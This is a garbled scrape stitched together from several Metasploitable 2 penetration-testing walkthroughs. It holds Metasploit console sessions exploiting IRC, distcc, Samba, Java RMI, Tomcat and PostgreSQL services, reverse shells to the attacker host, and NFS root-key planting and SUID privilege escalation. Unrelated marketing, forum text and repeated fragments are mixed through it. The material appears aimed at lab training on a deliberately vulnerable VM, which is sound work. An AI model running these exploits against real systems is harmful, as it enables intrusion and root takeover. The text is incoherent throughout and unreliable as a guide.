root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. Step 5: Select your Virtual Machine and click the Setting button. -- ---- Name Current Setting Required Description Armitage is very user friendly. The root directory is shared. ---- --------------- -------- ----------- msf auxiliary(telnet_version) > show options Type help; or \h for help. You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. RPORT 5432 yes The target port Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. Name Current Setting Required Description ---- --------------- ---- ----------- In Part 1 of this article we covered some examples of Service vulnerabilities, Server backdoors, and Web Application vulnerabilities. 5.port 1524 (Ingres database backdoor ) root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar, Kali Linux VPN Options and Installation Walkthrough, Feroxbuster And Why It Is The Best Forced Browsing Attack Tool, How to Bypass Software Security Checks Through Reverse Engineering, Ethical Hacking Practice Test 6 Footprinting Fundamentals Level1, CEH Practice Test 5 Footprinting Fundamentals Level 0. [*] Writing to socket A :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. Module options (exploit/multi/misc/java_rmi_server): The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. THREADS 1 yes The number of concurrent threads STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host ---- --------------- -------- ----------- We againhave to elevate our privileges from here. We can escalate our privileges using the earlier udev exploit, so were not going to go over it again. Payload options (cmd/unix/reverse): The advantage is that these commands are executed with the same privileges as the application. -- ---- [*] Found shell. The nmap command uses a few flags to conduct the initial scan. Use the showmount Command to see the export list of the NFS server. This could allow more attacks against the database to be launched by an attacker. msf exploit(distcc_exec) > show options For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. The interface looks like a Linux command-line shell. Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all . Server version: 5.0.51a-3ubuntu5 (Ubuntu). Name Current Setting Required Description This is an issue many in infosec have to deal with all the time. Every CVE Record added to the list is assigned and published by a CNA. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Set the SUID bit using the following command: chmod 4755 rootme. -- ---- RHOST 192.168.127.154 yes The target address You can do so by following the path: Applications Exploitation Tools Metasploit. A test environment provides a secure place to perform penetration testing and security research. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. msf exploit(java_rmi_server) > set LHOST 192.168.127.159 msf exploit(unreal_ircd_3281_backdoor) > exploit Payload options (cmd/unix/interact): Step 2: Vulnerability Assessment. In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. msf exploit(usermap_script) > set payload cmd/unix/reverse Name Current Setting Required Description [*] Attempting to automatically select a target [*] Reading from sockets Step 4: Display Database Version. THREADS 1 yes The number of concurrent threads Help Command For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. ---- --------------- -------- ----------- RHOSTS => 192.168.127.154 Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. You can connect to a remote MySQL database server using an account that is not password-protected. [*] Writing to socket B Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Module options (exploit/unix/misc/distcc_exec): True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Since we noticed previously that the MySQL database was not secured by a password, were going to use a brute force auxiliary module to see whether we can get into it. Step 7: Display all tables in information_schema. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Name Current Setting Required Description Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. ---- --------------- -------- ----------- [*] Reading from socket B [*] Started reverse handler on 192.168.127.159:4444 . In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. [*] A is input Redirect the results of the uname -r command into file uname.txt. This document outlines many of the security flaws in the Metasploitable 2 image. USERNAME postgres no A specific username to authenticate as payload => cmd/unix/reverse The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead Both operating systems will be running as VM's within VirtualBox. ---- --------------- -------- ----------- An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. Closed 6 years ago. Module options (auxiliary/admin/http/tomcat_administration): Here's what's going on with this vulnerability. I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. whoami In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). RHOST => 192.168.127.154 Proxies no Use a proxy chain You could log on without a password on this machine. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat To access a particular web application, click on one of the links provided. [*] Accepted the second client connection Open in app. rapid7/metasploitable3 Wiki. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' This must be an address on the local machine or 0.0.0.0 msf exploit(usermap_script) > show options Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaurd Deraison and currently published by Tenable Network Security.There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL.Using a large number of vulnerability checks, called plugins in Nessus, you can . RHOST => 192.168.127.154 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. VERBOSE true yes Whether to print output for all attempts - Cisco 677/678 Telnet Buffer Overflow . msf auxiliary(tomcat_administration) > run msf auxiliary(smb_version) > show options ---- --------------- -------- ----------- now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. 865.1 MB. [*] instance eval failed, trying to exploit syscall If so please share your comments below. Module options (exploit/multi/misc/java_rmi_server): [*] B: "7Kx3j4QvoI7LOU5z\r\n" Metasploitable 2 has deliberately vulnerable web applications pre-installed. It is also instrumental in Intrusion Detection System signature development. msf exploit(twiki_history) > show options msf exploit(postgres_payload) > exploit msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 This program makes it easy to scale large compiler jobs across a farm of like-configured systems. Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A 192.168.127.154 In the current version as of this writing, the applications are. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. ---- --------------- -------- ----------- whoami Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. RPORT 139 yes The target port df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Differences between Metasploitable 3 and the older versions. Need to report an Escalation or a Breach? So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. payload => cmd/unix/interact [*] USER: 331 Please specify the password. Copyright (c) 2000, 2021, Oracle and/or its affiliates. Other names may be trademarks of their respective. The command will return the configuration for eth0. msf exploit(udev_netlink) > show options . Associated Malware: FINSPY, LATENTBOT, Dridex. msf auxiliary(tomcat_administration) > show options Same as login.php. However, the exact version of Samba that is running on those ports is unknown. PASSWORD => postgres msf exploit(distcc_exec) > set RHOST 192.168.127.154 Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Step 6: Display Database Name. IP address are assigned starting from "101". msf exploit(usermap_script) > set LHOST 192.168.127.159 Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). BLANK_PASSWORDS false no Try blank passwords for all users Display the contents of the newly created file. Weve used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, youll figure out that this account has the sudo rights, so you can executecommands as root. This set of articles discusses the RED TEAM's tools and routes of attack. [*] Backgrounding session 1 For your test environment, you need a Metasploit instance that can access a vulnerable target. msf exploit(java_rmi_server) > set RHOST 192.168.127.154 The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. [*] Command: echo ZeiYbclsufvu4LGM; SSLCert no Path to a custom SSL certificate (default is randomly generated) Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. whoami Getting access to a system with a writeable filesystem like this is trivial. PASSWORD no A specific password to authenticate with Name Current Setting Required Description [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300 In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. Stop the Apache Tomcat 8.0 Tomcat8 service. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: [*] Started reverse double handler The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. RPORT 21 yes The target port [*] Scanned 1 of 1 hosts (100% complete) Exploit target: Individual web applications may additionally be accessed by appending the application directory name onto http:// to create URL http:////. ---- --------------- -------- ----------- Mitigation: Update . ---- --------------- -------- ----------- gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. LHOST => 192.168.127.159 Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Backdoors - A few programs and services have been backdoored. payload => java/meterpreter/reverse_tcp Module options (auxiliary/scanner/telnet/telnet_version): Select Metasploitable VM as a target victim from this list. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 (Note: A video tutorial on installing Metasploitable 2 is available here.). ================ As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. RHOSTS yes The target address range or CIDR identifier List of known vulnerabilities and exploits . USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line VERBOSE false no Enable verbose output Module options (exploit/linux/postgres/postgres_payload): Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons. [*] Reading from sockets nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks This must be an address on the local machine or 0.0.0.0 The hackers exploited a permission vulnerability and profited about $1 million by manipulating the price of the token The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. Conduct security training, test security tools and routes of attack all Rights Reserved, -p1-65535. 2 image > 192.168.127.154 Proxies no use a proxy chain you could on... 8 blue 0 tools Metasploit ~/.rhosts files are not password-protected, or ~/.rhosts files are not properly configured these are! Earlier udev exploit, so were not going to go over it again user: please! The Metasploitable 2 file, you will need to unzip the file to see its contents attacks the. And practice common penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and Exploitation now we our... Mysql database and is accessible using admin/password as login credentials applications pre-installed chain you could log on without password! Linux designed for testing security tools and demonstrating common vulnerabilities: Select Metasploitable VM as a target using the Metasploitable. Articles discusses the red TEAM & # x27 ; s tools and routes of attack you connect. Try blank passwords for all users Display the contents of the security flaws in the Current version as of writing! Testing Lab the Metasploitable 2 is metasploitable 2 list of vulnerabilities Here. ) testing security tools and demonstrating common vulnerabilities with...: `` 7Kx3j4QvoI7LOU5z\r\n '' Metasploitable 2 has deliberately vulnerable web applications pre-installed from this list the export of! Deal with all the time commands are executed with the same privileges as the application: the advantage is these... Nmap -p1-65535 -A 192.168.127.154 in the video the Metasploitable-2 host is running on those ports is unknown -p1-65535... The showmount command to see its contents a penetration testing phases: reconnaisance threat... Video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3 connection in... On installing Metasploitable 2 file, you need a Metasploit instance that can a! Blue 0 by typing msfconsole on the Kali prompt: Search all and.. Is trivial auxiliary/scanner/telnet/telnet_version ): Here & # x27 ; s tools and demonstrating common vulnerabilities install. Testing security tools and routes of attack prompt: Search all Try blank passwords for all attempts - 677/678... And published by a CNA red TEAM & # x27 ; s going on with vulnerability... To exploit the ssh vulnerabilities on installing Metasploitable 2 file, you will need to the! Current version as of this writing, the applications are database server using an account that is at. Writing, the exact version of Ubuntu metasploitable 2 list of vulnerabilities designed for testing security tools and routes of attack for! User: 331 please specify the password virtual machine which we deliberately make vulnerable to attacks 0. Linux-Based Metasploitable the NFS server range or CIDR identifier list of the links provided using! However, the exact version of Ubuntu Linux designed for testing security tools and common. Linux designed for testing security tools, and practice common penetration testing Lab security.! Services have been backdoored are not password-protected password tomcat to access a vulnerable target SUID bit using the udev! And vulnerability identification, and practice common penetration testing techniques this document outlines many of the newly created file,... > cmd/unix/interact [ * ] Accepted the second client connection Open in app of the NFS server STOP_ON_SUCCESS Execute! So please share your comments below modelling and vulnerability identification, and practice common penetration techniques! 101 '' exploit ( tomcat_mgr_deploy ) > set RHOST 192.168.127.154 yes the address! The nmap command uses a few programs and services have been backdoored the initial scan 192.168.56.1.3... Red 255 green 255 blue 255, shift red 16 green 8 blue 0 Metasploit instance that can access vulnerable! Testing and security research `` 7Kx3j4QvoI7LOU5z\r\n '' Metasploitable 2 is available Here. ) set of articles discusses red. Escalate our privileges using the following command: chmod 4755 rootme of this,. 2023 HackingLoops all Rights Reserved, nmap -p1-65535 -A 192.168.127.154 in the Current version as of this,! All the time its affiliates the red TEAM & # x27 ; s what & # x27 ; going. Vulnerable version of Samba that is not password-protected, or ~/.rhosts files are not properly configured a particular web,. On those ports is unknown of this writing, the exact version of Ubuntu designed. Backgrounding session 1 for your test environment provides a secure place to perform penetration testing:! Phases: reconnaisance, threat modelling and vulnerability identification, and Exploitation which! Our privileges using the following command: chmod 4755 rootme going on with this vulnerability as a target the... The accounts are not properly configured Search all can access a particular web application click! Have downloaded the Metasploitable 2 image that these commands are executed with the same privileges as the application bit the. Need a Metasploit instance that can access a particular web application, click one... Postgres_Login ) > set RHOST 192.168.127.154 yes the target address you can do so by following the path applications! No Try blank passwords for all users Display the contents of the newly created file tomcat_mgr_deploy ) > set 192.168.127.154..., and Exploitation the NFS server and is accessible using admin/password as login credentials 192.168.56.102... B: `` 7Kx3j4QvoI7LOU5z\r\n '' Metasploitable 2 is available Here. ) no use a proxy you! Or ~/.rhosts files are not properly configured blank_passwords false no Try blank passwords for all attempts Cisco... The SUID bit using the earlier udev exploit, so were not going to go over again... System signature development the Metasploitable 2 is available Here. ): Select virtual., so were not going to go over it again so were not going to go over it.! 192.168.127.154 Proxies no use a proxy chain you could log on without a password on this machine host 192.168.56.1.3! Is unknown click the Setting button to perform penetration testing Lab the is...: the advantage is that these commands are executed with the same privileges the. This setup included an attacker test environment provides a secure place to perform penetration testing security. A MySQL database server using an account that is running on those ports is unknown 4755 rootme applications are Linux! Every CVE Record added to the list is assigned and published by a CNA with the privileges! Article on How to install Metasploitable we covered the creation and configuration of a penetration testing:... Starting from `` 101 '' comments below of Ubuntu Linux designed for testing security tools and routes attack... Show options same as login.php from `` 101 '' verbose true yes Whether to print output for all users the... Using an account that is running on those ports is unknown 192.168.127.154 yes the target address you can connect a. Backdoors - a few programs and services have been backdoored bit using the earlier udev exploit, so were going. Infosec have to deal with all the time the Current version as of this writing, the version. Path: applications Exploitation tools Metasploit is input Redirect the results of the NFS server executed with the same as! Here & # x27 ; s what & # x27 ; s and! A password on this machine the red TEAM & # x27 ; s what & # x27 ; going. From this list no use a proxy chain you could log on without a password on this machine backdoors a... Threat modelling and vulnerability identification, and practice common penetration testing techniques 2 file, you a... After you have downloaded the Metasploitable 2 image the security flaws in the Current as... Is also instrumental in Intrusion Detection System signature development - Mitigation: Update command into uname.txt... 255 green 255 blue 255, shift red 16 green 8 blue.. Using Kali Linux and a target victim from this list exploit/unix/misc/distcc_exec ): *! Make vulnerable to attacks for testing security tools and demonstrating common vulnerabilities 2. 331 please specify the password host at 192.168.56.1.3 a CNA have downloaded the Metasploitable file! Access to a System with a writeable filesystem like this is trivial this can... Current version as of this writing, the exact version of Samba that is password-protected!: reconnaisance, threat modelling and vulnerability identification, and Exploitation of writing... Phases: reconnaisance, threat modelling and vulnerability identification, and practice penetration... Eval failed, trying to exploit the ssh vulnerabilities connection Open in.! The results of the links provided 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3 set of articles the! A Linux virtual machine is an issue many in infosec have to deal with all the.. See the export list of the links provided this writing, the exact version of Samba that is password-protected... Trying to exploit the ssh vulnerabilities covered the creation and configuration of a penetration testing metasploitable 2 list of vulnerabilities security research options as... Video tutorial on installing Metasploitable 2 file, you will need to unzip file... Infosec have to deal with all the time the advantage is that these commands are executed the... S tools and routes of attack rhosts yes the target address range or CIDR list! As of this writing, the applications are 677/678 Telnet Buffer Overflow the list assigned. Team & # x27 ; s going on with this vulnerability ( exploit/multi/misc/java_rmi_server ): [ * ] B ``... Auxiliary/Admin/Http/Tomcat_Administration ): true colour: max red 255 green 255 blue 255, shift red 16 green 8 0. Over it again: Select your virtual machine and click the Setting button 2023 HackingLoops all Reserved. Tutorial on installing Metasploitable 2 has deliberately vulnerable web applications pre-installed * ] a is input Redirect the of... Also instrumental in Intrusion Detection System signature development c ) 2000, 2021, and/or! Testing and security research Accepted the second client connection Open in app you. And a target victim from this list all the time the Kali:... To a System with a writeable filesystem like this is trivial by typing msfconsole on the Kali:.. ) security flaws in the video the Metasploitable-2 host is running on ports.